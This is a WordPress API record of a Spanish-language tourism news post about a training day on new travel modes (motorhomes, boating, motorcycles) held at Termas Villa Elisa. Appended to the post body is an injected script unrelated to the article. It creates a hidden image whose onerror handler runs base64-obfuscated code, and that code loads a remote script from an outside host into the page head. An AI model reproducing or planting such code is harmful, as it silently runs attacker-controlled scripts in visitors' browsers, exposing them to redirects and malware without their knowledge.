{"id":6868,"date":"2023-06-10T21:30:32","date_gmt":"2023-06-11T00:30:32","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=6868"},"modified":"2025-08-13T15:59:12","modified_gmt":"2025-08-13T18:59:12","slug":"turismo-organizo-la-jornada-de-capacitacion-e-intercambio-de-experiencias-sobre-nuevas-modalidades-en-villa-elisa","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=6868","title":{"rendered":"Turismo organizo la jornada de capacitaci\u00f3n e intercambio de experiencias sobre nuevas modalidades en Villa Elisa"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-black-color has-light-green-cyan-background-color has-text-color has-background\"><em>En conjunto con la Fundaci\u00f3n Iapser y la colaboraci\u00f3n de la municipalidad de Villa Elisa, Termas Villa Elisa y la CaTurVE; Turismo Entre R\u00edos organiz\u00f3 la jornada el pasado martes 30 de mayo en el Hotel Quinto Elemento, del Parque Termal de Termas Villa Elisa<\/em><\/h4>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright size-large is-resized\"><a href=\"https:\/\/www.termatalia.com\/\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/IMG-20230526-WA0007-727x1024.jpg\" alt=\"\" class=\"wp-image-6825\" width=\"320\" height=\"451\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/IMG-20230526-WA0007-727x1024.jpg 727w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/IMG-20230526-WA0007-213x300.jpg 213w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/IMG-20230526-WA0007-768x1082.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/IMG-20230526-WA0007-1091x1536.jpg 1091w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/IMG-20230526-WA0007-696x980.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/IMG-20230526-WA0007-1068x1504.jpg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/IMG-20230526-WA0007-298x420.jpg 298w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/IMG-20230526-WA0007-320x451.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/IMG-20230526-WA0007-480x676.jpg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/IMG-20230526-WA0007-800x1127.jpg 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/IMG-20230526-WA0007.jpg 1136w\" sizes=\"(max-width: 320px) 100vw, 320px\" \/><\/a><\/figure>\n<\/div>\n\n\n<p>Esta jornada, en conjunto con las dos que se desarrollar\u00e1n pr\u00f3ximamente en la ciudad de Villaguay y posteriormente en Paran\u00e1, fueron resultado del Plan Estrat\u00e9gico Turismo 2023. Estas, surgen de la necesidad planteada por el conjunto de representantes del sector tur\u00edstico provincial que participaron de las reuniones territoriales donde se gest\u00f3 el mismo.<\/p>\n\n\n\n<p>El objetivo de las jornadas consiste en sensibilizar e informar al mismo tiempo que permite al desarrollo de servicios adaptados a las nuevas modalidades de movilidad que se han potenciado post pandemia, concientizando sobre los servicios requeridos por estos segmentos;&nbsp;as\u00ed como poner en evidencia el volumen de clientes y la potencialidad de este mercado.<\/p>\n\n\n\n<p>Durante la ma\u00f1ana, los encargados de informar fueron: Marcelo Pistorio, de Autocamping Tv, experiment\u00f3 rodantero inmerso en el mundo de los Motorhome;\u00a0Lorena Villamayor, docente de la USAL, se encarg\u00f3 de las experiencias en turismo n\u00e1utico.\u00a0Por \u00faltimo, el instructor y piloto de Moto Rally, David Tieppo habl\u00f3 sobre su experiencia coordinando grupos de moteros que disfrutan del Off Road.<\/p>\n\n\n\n<p>Por la tarde, compartieron sus experiencias: Carlos Monti, operador tur\u00edstico de Paran\u00e1, que inform\u00f3 sobre la venta de paquetes Tur\u00edsticos en Motocicleta;&nbsp;representantes del Yacht Club de Concepci\u00f3n del Uruguay sobre Regatas N\u00e1uticas;&nbsp;Lili Tarantino de \u201cMoteros Recorriendo Argentina\u201d;&nbsp;la Familia Zapp sobre \u201cExperiencias de viaje por el mundo en un auto del a\u00f1o 1928\u201d;&nbsp;luego se desarrollar\u00e1 el panel de cierre y para finalizar, una corrida por las instalaciones del camping y complejo Termas de Villa Elisa.<\/p>\n\n\n\n<p>Estas charlas se usaron para todo p\u00fablico;&nbsp;pero enfocadas en prestadores de servicios del territorio entrerriano, especialmente aquellos poseedores de servicios de camping y n\u00e1utica.&nbsp;Como as\u00ed tambi\u00e9n al conjunto de prestadores de servicios de la actividad tur\u00edstica, \u00e1reas de turismo de municipios y comunas, a organizaciones involucradas, proveedores, y p\u00fablico en general.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><a href=\"https:\/\/www.entrerios.tur.ar\/noticia\/405\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/06\/Captura-web_10-6-2023_21272_www.entrerios.tur_.ar_.jpeg\" alt=\"\" class=\"wp-image-6869\" width=\"215\" height=\"58\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/06\/Captura-web_10-6-2023_21272_www.entrerios.tur_.ar_.jpeg 423w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/06\/Captura-web_10-6-2023_21272_www.entrerios.tur_.ar_-300x81.jpeg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/06\/Captura-web_10-6-2023_21272_www.entrerios.tur_.ar_-320x86.jpeg 320w\" sizes=\"(max-width: 215px) 100vw, 215px\" \/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>En conjunto con la Fundaci\u00f3n Iapser y la colaboraci\u00f3n de la municipalidad de Villa Elisa, Termas Villa Elisa y la CaTurVE; Turismo Entre R\u00edos organiz\u00f3 la jornada el pasado martes 30 de mayo en el Hotel Quinto Elemento, del Parque Termal de Termas Villa Elisa Esta jornada, en conjunto con las dos que se desarrollar\u00e1n [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":6870,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[30],"tags":[],"class_list":["post-6868","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-temas-relacionados"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/6868","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=6868"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/6868\/revisions"}],"predecessor-version":[{"id":10385,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/6868\/revisions\/10385"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/6870"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=6868"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=6868"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=6868"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}